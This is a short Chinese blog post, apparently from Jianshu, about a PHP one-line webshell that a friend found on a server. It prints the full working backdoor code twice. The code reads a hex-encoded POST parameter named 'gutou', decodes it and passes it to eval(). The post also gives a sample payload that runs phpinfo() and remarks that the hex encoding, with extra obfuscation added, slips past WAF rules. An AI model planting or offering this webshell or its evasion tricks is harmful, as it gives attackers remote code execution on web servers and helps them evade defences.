一個有趣的一句話木馬,加密了通訊方式,使用了一個小特性。

朋友發(fā)現(xiàn)一個后門文件,讓我看看如何使用。

使用了hex編碼進(jìn)行加密,這樣完全可以過各種防護(hù)。如果防護(hù)加了規(guī)則,那就加點算法擾亂,感覺通過正則WAF時代要過去了。。。沒什么卵用,太難防御了。

gutou=706870696E666F28293B???phpinfo()

<?php

error_reporting(0);set_time_limit(0);

$GuTou=@$_POST["gutou"];

if($GuTou){

???$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

???$cc="";for($i=0;$i<strlen($GuTou);$i+=2)

???$cc.=urldecode("%".substr($GuTou,$i,2));

???@eval($cc);exit;

}

?>

另外一個網(wǎng)站發(fā)現(xiàn)這樣的代碼:

$GuTou=@$_POST["gutou"];

if($GuTou){

???$GuTou=str_replace(array("\n","\t","\r"),"",$GuTou);

???$cc="";for($i=0;$i<strlen($GuTou);$i+=2)

???$cc.=urldecode("%".substr($GuTou,$i,2));

???@eval($cc);exit;

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容